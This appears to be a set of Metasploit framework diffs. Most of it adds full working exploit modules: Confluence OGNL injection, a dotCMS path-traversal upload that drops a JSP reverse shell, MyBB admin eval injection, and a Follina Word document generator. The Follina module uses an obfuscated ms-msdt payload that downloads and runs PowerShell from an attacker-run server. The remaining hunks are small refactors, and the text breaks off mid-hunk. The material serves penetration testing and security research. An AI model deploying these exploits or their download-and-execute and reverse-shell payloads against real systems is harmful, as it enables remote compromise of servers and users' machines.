+        if can_mount?(grp, datastore['Mountable'], datastore['HOSTNAME'], datastore['LHOST'] || '')
+          print_good("#{ip} Mountable NFS Export: #{dir} [#{grp.join(', ')}]")
+        else
+          print_status("#{ip} NFS Export: #{dir} [#{grp.join(', ')}]")
        end
-        report_note(
-          :host => ip,
-          :proto => datastore['PROTOCOL'],
-          :port => 2049,
-          :type => 'nfs.exports',
-          :data => { :exports => shares },
-          :update => :unique_data
-        )
-      elsif(exports == 0x00)
-        vprint_status("#{ip} - No exported directories")
+        shares << [dir, grp]
      end
-
-      sunrpc_destroy
-    rescue ::Rex::Proto::SunRPC::RPCTimeout, ::Rex::Proto::SunRPC::RPCError => e
-      vprint_error(e.to_s)
+      report_note(
+        host: ip,
+        proto: datastore['PROTOCOL'],
+        port: 2049,
+        type: 'nfs.exports',
+        data: { exports: shares },
+        update: :unique_data
+      )
+    elsif (exports == 0x00)
+      vprint_status("#{ip} - No exported directories")
    end
+
+    sunrpc_destroy
+  rescue ::Rex::Proto::SunRPC::RPCTimeout, ::Rex::Proto::SunRPC::RPCError => e
+    vprint_error(e.to_s)
  end
 end
@@ -17,9 +17,10 @@ class MetasploitModule < Msf::Auxiliary
      'Description' => %q{
        This module provides a SMB service that can be used to capture the challenge-response
        password NTLMv1 & NTLMv2 hashes used with SMB1, SMB2, or SMB3 client systems.
-        Responses sent by this service have by default a random 8 byte challenge string
-        of format `\x11\x22\x33\x44\x55\x66\x77\x88`, allowing for easy cracking using
-        Cain & Abel (NTLMv1) or John the ripper (with jumbo patch).
+        Responses sent by this service by default use a random 8 byte challenge string.
+        A specific value (such as `1122334455667788`) can be set using the CHALLENGE option,
+        allowing for easy cracking using Cain & Abel (NTLMv1) or John the Ripper
+        (with jumbo patch).

        To exploit this, the target system must try to authenticate to this
        module. One way to force an SMB authentication attempt is by embedding
@@ -62,10 +62,10 @@ class MetasploitModule < Msf::Exploit::Remote
        'DisclosureDate' => '2022-02-02',
        'DefaultTarget' => 0,
        'Notes' => {
-          'Stability' => CRASH_SERVICE_RESTARTS,
+          'Stability' => [CRASH_SERVICE_RESTARTS],
          # repeatable... but only works 65% of the time, see comments above
-          'Reliability' => REPEATABLE_SESSION,
-          'SideEffects' => nil
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
        }
      )
    )
@@ -0,0 +1,202 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Atlassian Confluence Namespace OGNL Injection',
+        'Description' => %q{
+          This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to
+          evaluate an OGNL expression resulting in OS command execution.
+        },
+        'Author' => [
+          'Unknown', # exploited in the wild
+          'bturner-r7',
+          'jbaines-r7',
+          'Spencer McIntyre'
+        ],
+        'References' => [
+          ['CVE', '2022-26134'],
+          ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],
+          ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],
+          ['URL', 'https://github.com/jbaines-r7/through_the_wire'],
+          ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']
+        ],
+        'DisclosureDate' => '2022-06-02',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux', 'win'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8090
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    confluence_version = get_confluence_version
+    return CheckCode::Unknown unless confluence_version
+
+    vprint_status("Detected Confluence version: #{confluence_version}")
+
+    confluence_platform = get_confluence_platform
+    unless confluence_platform
+      return CheckCode::Safe('Failed to test OGNL injection.')
+    end
+
+    vprint_status("Detected target platform: #{confluence_platform}")
+    CheckCode::Vulnerable('Successfully tested OGNL injection.')
+  end
+
+  def get_confluence_platform
+    # this method gets the platform by exploiting CVE-2022-26134
+    return @confluence_platform if @confluence_platform
+
+    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
+    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
+      ${
+        Class.forName("com.opensymphony.webwork.ServletActionContext")
+          .getMethod("getResponse",null)
+          .invoke(null,null)
+          .setHeader(
+            "#{header}",
+            Class.forName("javax.script.ScriptEngineManager")
+              .newInstance()
+              .getEngineByName("js")
+              .eval("java.lang.System.getProperty('os.name')")
+            )
+      }
+    OGNL
+    res = inject_ognl(ognl)
+    return nil unless res
+
+    res.headers[header]
+  end
+
+  def get_confluence_version
+    return @confluence_version if @confluence_version
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.action')
+    )
+    return nil unless res&.code == 200
+
+    poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text
+    return nil unless poweredby =~ /Confluence (\d+(\.\d+)*)/
+
+    @confluence_version = Rex::Version.new(Regexp.last_match(1))
+    @confluence_version
+  end
+
+  def exploit
+    confluence_platform = get_confluence_platform
+    unless confluence_platform
+      fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')
+    end
+
+    unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')
+      fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")
+    end
+
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :cmd
+      execute_command(payload.encoded)
+    when :dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
+    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
+      ${
+        Class.forName("com.opensymphony.webwork.ServletActionContext")
+          .getMethod("getResponse",null)
+          .invoke(null,null)
+          .setHeader("#{header}",
+            Class.forName("javax.script.ScriptEngineManager")
+              .newInstance()
+              .getEngineByName("js")
+              .eval("java.lang.Runtime.getRuntime().exec([
+                #{target['Platform'] == 'win' ? "'cmd.exe','/c'" : "'/bin/sh','-c'"},
+                com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')
+              ]); '#{Faker::Internet.uuid}'")
+            )
+      }
+    OGNL
+    res = inject_ognl(ognl, 'headers' => { header => cmd })
+
+    unless res && res.headers.include?(header)
+      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
+    end
+
+    vprint_good("Successfully executed command: #{cmd}")
+    res.headers[header]
+  end
+
+  def inject_ognl(ognl, opts = {})
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl), 'dashboard.action')
+    }.merge(opts))
+  end
+end
@@ -0,0 +1,167 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'DotCMS RCE via Arbitrary File Upload.',
+        'Description' => %q{
+          When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the
+          file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename
+          passed in via the multipart request header and thus does not sanitize the temp file's name.  This allows a
+          specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content)  that get
+          written outside of the dotCMS temp directory.  In the case of this exploit, an attacker can upload a special
+          .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.
+        },
+        'Author' => [
+          'Shubham Shah',  # Discovery and analysis
+          'Hussein Daher', # Discovery and analysis
+          'jheysel-r7'     # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-26352'],
+          ['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']
+        ],
+        'Privileged' => false,
+        'Platform' => %w[linux win],
+        'Targets' => [
+          [
+            'Java Linux',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'Java Windows',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'win'
+            }
+          ]
+        ],
+        'DisclosureDate' => '2022-05-03',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true,
+          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(8443),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    test_content = Rex::Text.rand_text_alpha(10)
+    test_file = "#{test_content}.jsp"
+    test_path = "../../#{test_file}"
+    uuid = Faker::Internet.uuid
+
+    jsp = <<~EOS
+      <%@ page import=\"java.io.File\" %>
+      <%
+        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");
+        jsp.delete();
+      %>
+      #{uuid}
+    EOS
+
+    vars_form_data = [
+      {
+        'name' => 'name',
+        'data' => jsp,
+        'encoding' => nil,
+        'filename' => test_path,
+        'mime_type' => 'text/plain'
+      }
+    ]
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/api/content/'),
+      'vars_form_data' => vars_form_data
+    )
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, test_file.to_s)
+    )
+
+    if res && res.body.include?(uuid)
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def write_jsp_payload
+    jsp_path = "../../#{jsp_filename}"
+    print_status('Writing JSP payload')
+    vars_form_data = [
+      {
+        'name' => 'name',
+        'data' => payload.encoded,
+        'encoding' => nil,
+        'filename' => jsp_path,
+        'mime_type' => 'text/plain'
+      }
+    ]
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/api/content/'),
+      'vars_form_data' => vars_form_data
+    )
+
+    unless res&.code == 500
+      fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')
+    end
+
+    register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")
+    print_good('Successfully wrote JSP payload')
+  end
+
+  def execute_jsp_payload
+    jsp_uri = normalize_uri(target_uri.path, jsp_filename)
+    print_status('Executing JSP payload')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => jsp_uri
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')
+    end
+    print_good('Successfully executed JSP payload')
+  end
+
+  def exploit
+    write_jsp_payload
+    execute_jsp_payload
+  end
+
+  def jsp_filename
+    @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"
+  end
+end
@@ -0,0 +1,278 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'MyBB Admin Control Code Injection RCE',
+        'Description' => %q{
+          This exploit module leverages an improper input validation
+          vulnerability in MyBB prior to `1.8.30` to execute arbitrary code in
+          the context of the user running the application.
+
+          MyBB Admin Control setting page calls PHP `eval` function with an
+          unsanitized user input. The exploit adds a new setting, injecting the
+          payload in the vulnerable field, and triggers its execution with a
+          second request. Finally, it takes care of cleaning up and removes the
+          setting.
+
+          Note that authentication is required for this exploit to work and the
+          account must have rights to add or update settings (typically, myBB
+          administrator role).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Cillian Collins', # vulnerability research
+          'Altelus', # original PoC
+          'Christophe De La Fuente' # MSF module
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f'],
+          [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-22-503/'],
+          [ 'URL', 'https://github.com/Altelus1/CVE-2022-24734'],
+          [ 'CVE', '2022-24734']
+        ],
+        'Platform' => %w[php unix linux win],
+        'Privileged' => false,
+        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
+              'Type' => :in_memory
+            }
+          ],
+          [
+            'Unix (In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_php_ssl' },
+              'Type' => :in_memory
+            }
+          ],
+          [
+            'Linux (Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :dropper
+            }
+          ],
+          [
+            'Windows (In-Memory)',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' },
+              'Type' => :in_memory
+            }
+          ],
+          [
+            'Windows (Dropper)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
+              'Type' => :dropper
+            }
+          ]
+        ],
+        'DisclosureDate' => '2022-03-09',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'MyBB Admin CP username' ]),
+        OptString.new('PASSWORD', [ true, 'MyBB Admin CP password' ]),
+        OptString.new('TARGETURI', [ true, 'The URI of the MyBB application', '/'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'GET',
+      'vars_get' => { 'intcheck' => 1 }
+    })
+    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+    # see https://github.com/mybb/mybb/blob/feature/inc/class_core.php#L307-L310
+    unless res.body.include?('&#077;&#089;&#066;&#066;')
+      return CheckCode::Unknown("#{peer} - Cannot find MyBB forum running at #{target_uri.path}")
+    end
+
+    print_good("MyBB forum found running at #{target_uri.path}")
+
+    return CheckCode::Detected
+  end
+
+  def login
+    vprint_status('Attempting login')
+
+    cookie_jar.cleanup(true)
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/admin/index.php'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'do' => 'login'
+      }
+    })
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    unless res.body.match(/Logged in as .*#{datastore['USERNAME']}/)
+      fail_with(Failure::NoAccess, "#{peer} - Invalid credentials")
+    end
+
+    print_good('Login successful!')
+  end
+
+  def send_config_settings(method: 'GET', action: 'add', vars_get: {}, vars_post: {}, check_response: true)
+    req_hash = {
+      'uri' => normalize_uri(target_uri.path, '/admin/index.php'),
+      'method' => method,
+      'vars_get' => {
+        'module' => 'config-settings',
+        'action' => action
+      }.merge(vars_get)
+    }
+    req_hash['vars_post'] = vars_post unless vars_post.blank?
+    res = send_request_cgi(req_hash, datastore['WfsDelay'] > 0 ? datastore['WfsDelay'] : 2)
+    if check_response && res.nil?
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response")
+    end
+    res
+  end
+
+  def exploit
+    login
+
+    res = send_config_settings
+    if res.body.include?('Access Denied')
+      fail_with(Failure::NoAccess, "#{peer} - Supplied user doesn't have the rights to add a setting")
+    end
+
+    vprint_status('Adding a malicious settings')
+    doc = res.get_html_document
+    @my_post_key = doc.xpath('//input[@name="my_post_key"]/@value').text
+
+    case target['Type']
+    when :in_memory
+      execute_command(payload.encoded)
+    when :dropper
+      execute_cmdstager
+    end
+  end
+
+  def send_payload(cmd)
+    vprint_status('Adding a crafted configuration setting entry with the payload')
+
+    cmd = cmd.gsub(/\\/, '\\' => '\\\\')
+    cmd = cmd.gsub(/"/, '"' => '\\"')
+    cmd = cmd.gsub(/\$/, '$' => '\\$')
+
+    case target['Platform']
+    when 'php'
+      extra = "\" . eval(\"#{cmd}\") .\""
+    when 'win'
+      if target['Arch'] == ARCH_CMD
+        # Force cmd to run in the background (only works for `cmd`)
+        extra = "\" . pclose(popen(\"start /B #{cmd}\", \"r\")) .\""
+      else
+        extra = "\" . system(\"#{cmd}\") .\""
+      end
+    else
+      extra = "\" . system(\"#{cmd} > /dev/null &\") .\""
+    end
+
+    post_data = {
+      my_post_key: @my_post_key,
+      title: Rex::Text.rand_text_alpha(rand(8...16)),
+      description: Rex::Text.rand_text_alpha(rand(8...16)),
+      gid: 1,
+      disporder: '',
+      name: Rex::Text.rand_text_alpha(rand(8...16)),
+      type: "\tphp",
+      extra: extra,
+      value: Rex::Text.rand_text_alpha(rand(8...16))
+    }
+
+    res = send_config_settings(method: 'POST', vars_post: post_data)
+    unless res.code == 302
+      doc = res.get_html_document
+      err = doc.xpath('//div[@class="error"]').text
+      fail_with(Failure::Unknown,
+                "#{peer} - The module expected a 302 response but received: "\
+                "#{res.code}. Exploit didn't work.#{" Reason: #{err}" if err.present?}")
+    end
+
+    vprint_good('Payload successfully sent')
+  end
+
+  def trigger_payload
+    vprint_status('Triggering the payload execution')
+    # We're not expecting response to this query
+    send_config_settings(action: 'change', check_response: false)
+  end
+
+  def remove_setting
+    vprint_status('Removing the configuration setting')
+
+    vprint_status('Grab the delete parameters')
+    res = send_config_settings(action: 'manage')
+    if res.body.include?('<title>MyBB Control Panel - Login</title>')
+      # this exploit seems to logout users sometimes, so, try to login again and retry
+      print_status('User session is not valid anymore. Trying to login again to cleanup')
+      login
+      res = send_config_settings(action: 'manage')
+    end
+
+    doc = res.get_html_document
+    control_links = doc.xpath('//div[@class="popup_item_container"]/a/@href')
+    uri = control_links.detect do |href|
+      href.text.include?('action=delete') && href.text.include?("my_post_key=#{@my_post_key}")
+    end
+    if uri.nil?
+      print_warning("#{peer} - URI not found in `Modify Settings` page - cannot cleanup")
+      return
+    end
+
+    vprint_status('Send the delete request')
+    params = uri.text.split('?')[1]
+    get_data = CGI.parse(params).transform_values(&:join)
+    send_config_settings(method: 'POST', vars_get: get_data)
+  end
+
+  def execute_command(cmd, _opt = {})
+    send_payload(cmd)
+    trigger_payload
+    remove_setting
+    print_status('Shell incoming...')
+  end
+end
@@ -163,7 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote
  def repeat_operation(op, opts = {})
    datastore['OperationMaxRetries'].times do |i|
      vprint_status("#{op}: try ##{i + 1}")
-      res = opts.empty? ? send(op) : send(op, opts)
+      res = opts.empty? ? send(op) : send(op, **opts)
      return res if res
    end
    nil
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
        },
        'DefaultTarget' => 2,
        'Notes' => {
-          'NOCVE' => '0day',
+          'NOCVE' => ['0day'],
          'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'References'     =>
        [
          [ 'CVE', '2014-4936' ],
-          [' OSVDB', '116050'],
+          [ 'OSVDB', '116050' ],
          [ 'URL', 'http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and'] # Discoverer's blog
        ],
      'DefaultOptions' =>
@@ -0,0 +1,225 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft Office Word MSDTJS',
+        'Description' => %q{
+          This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template
+          feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.
+        },
+        'References' => [
+          ['CVE', '2022-30190'],
+          ['URL', 'https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/'],
+          ['URL', 'https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19'],
+          ['URL', 'https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/'],
+          ['URL', 'https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e'],
+          ['URL', 'https://twitter.com/GossiTheDog/status/1531608245009367040'],
+          ['URL', 'https://github.com/JMousqueton/PoC-CVE-2022-30190']
+        ],
+        'Author' => [
+          'nao sec', # Original disclosure.
+          'mekhalleh (RAMELLA Sébastien)' # Zeop CyberSecurity
+        ],
+        'DisclosureDate' => '2022-05-29',
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => false,
+          'FILENAME' => 'msf.docx',
+          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+          'SRVHOST' => Rex::Socket.source_address('1.2.3.4')
+        },
+        'Targets' => [
+          [ 'Microsoft Office Word', {} ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'AKA' => ['Follina'],
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [UNRELIABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),
+      OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])
+    ])
+  end
+
+  def get_file_in_docx(fname)
+    i = @docx.find_index { |item| item[:fname] == fname }
+
+    unless i
+      fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")
+    end
+
+    @docx.fetch(i)[:data]
+  end
+
+  def get_template_path
+    datastore['CUSTOMTEMPLATE'] || File.join(Msf::Config.data_directory, 'exploits', 'word_msdtjs.docx')
+  end
+
+  def generate_html
+    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1"
+
+    dummy = ''
+    (1..random_int(61, 100)).each do |_n|
+      dummy += '//' + rand_text_alpha(100) + "\n"
+    end
+
+    cmd = Rex::Text.encode_base64("IEX(New-Object Net.WebClient).downloadString('#{uri}')")
+
+    js_content = "window.location.href = \"ms-msdt:/id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'#{cmd}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\\\"\";"
+    if datastore['OBFUSCATE']
+      print_status('Obfuscate JavaScript content')
+
+      js_content = Rex::Exploitation::JSObfu.new js_content
+      js_content = js_content.obfuscate(memory_sensitive: false)
+    end
+
+    html = '<!DOCTYPE html><html><head><meta http-equiv="Expires" content="-1"><meta http-equiv="X-UA-Compatible" content="IE=11"></head><body><script>'
+    html += "\n#{dummy}\n#{js_content}\n"
+    html += '</script></body></html>'
+
+    html
+  end
+
+  def inject_docx
+    document_xml = get_file_in_docx('word/document.xml')
+    unless document_xml
+      fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')
+    end
+
+    document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')
+    unless document_xml_rels
+      fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')
+    end
+
+    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
+    @docx.each do |entry|
+      case entry[:fname]
+      when 'word/_rels/document.xml.rels'
+        entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', "#{uri}&#x21;")
+      end
+    end
+  end
+
+  def normalize_uri(*strs)
+    new_str = strs * '/'
+
+    new_str = new_str.gsub!('//', '/') while new_str.index('//')
+
+    # makes sure there's a starting slash
+    unless new_str.start_with?('/')
+      new_str = '/' + new_str
+    end
+
+    new_str
+  end
+
+  def on_request_uri(cli, request)
+    header_html = {
+      'Access-Control-Allow-Origin' => '*',
+      'Access-Control-Allow-Methods' => 'GET, POST',
+      'Cache-Control' => 'no-store, no-cache, must-revalidate',
+      'Content-Type' => 'text/html; charset=UTF-8'
+    }
+
+    if request.method.eql? 'HEAD'
+      send_response(cli, '', header_html)
+    elsif request.method.eql? 'OPTIONS'
+      response = create_response(501, 'Unsupported Method')
+      response['Content-Type'] = 'text/html'
+      response.body = ''
+
+      cli.send_response(response)
+    elsif request.raw_uri.to_s.end_with? '.html'
+      print_status('Sending HTML Payload')
+
+      send_response_html(cli, generate_html, header_html)
+    elsif request.raw_uri.to_s.end_with? '.ps1'
+      print_status('Sending PowerShell Payload')
+
+      send_response(cli, @payload_data, header_html)
+    end
+  end
+
+  def pack_docx
+    @docx.each do |entry|
+      if entry[:data].is_a?(Nokogiri::XML::Document)
+        entry[:data] = entry[:data].to_s
+      end
+    end
+
+    Msf::Util::EXE.to_zip(@docx)
+  end
+
+  def primer
+    print_status('Generating a malicious docx file')
+
+    @proto = (datastore['SSL'] ? 'https' : 'http')
+
+    template_path = get_template_path
+    unless File.extname(template_path).downcase.end_with?('.docx')
+      fail_with(Failure::BadConfig, 'Template is not a docx file!')
+    end
+
+    print_status("Using template '#{template_path}'")
+    @docx = unpack_docx(template_path)
+
+    print_status('Injecting payload in docx document')
+    inject_docx
+
+    print_status("Finalizing docx '#{datastore['FILENAME']}'")
+    file_create(pack_docx)
+
+    @payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
+
+    super
+  end
+
+  def random_int(min, max)
+    rand(max - min) + min
+  end
+
+  def unpack_docx(template_path)
+    document = []
+
+    Zip::File.open(template_path) do |entries|
+      entries.each do |entry|
+        if entry.name.downcase.end_with?('.xml', '.rels')
+          content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?
+        elsif entry.file?
+          content = entry.get_input_stream.read
+        end
+
+        vprint_status("Parsing item from template: #{entry.name}")
+
+        document << { fname: entry.name, data: content }
+      end
+    end
+
+    document
+  end
+
+end
@@ -34,15 +34,26 @@ module MetasploitModule
    super
  end

-  def generate
+  def generate(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
    payload = super

    cmd_psh_payload(payload, ARCH_X86, remove_comspec: true)
  end

+  def generate_stage(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
+
  def generate_payload_uuid(conf = {})
    conf[:arch] ||= module_info['AdaptedArch']
    conf[:platform] ||= module_info['AdaptedPlatform']
    super
  end
+
+  def handle_connection(conn, opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
 end
@@ -34,15 +34,26 @@ module MetasploitModule
    super
  end

-  def generate
+  def generate(opts = {})
